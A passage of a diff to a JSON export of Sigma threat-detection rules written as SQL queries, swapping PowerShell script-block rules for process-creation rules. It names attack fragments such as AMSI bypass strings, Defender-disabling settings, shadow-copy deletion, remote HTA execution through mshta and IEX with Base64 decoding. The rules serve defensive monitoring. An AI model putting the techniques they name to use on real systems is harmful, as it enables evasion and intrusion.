"posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": 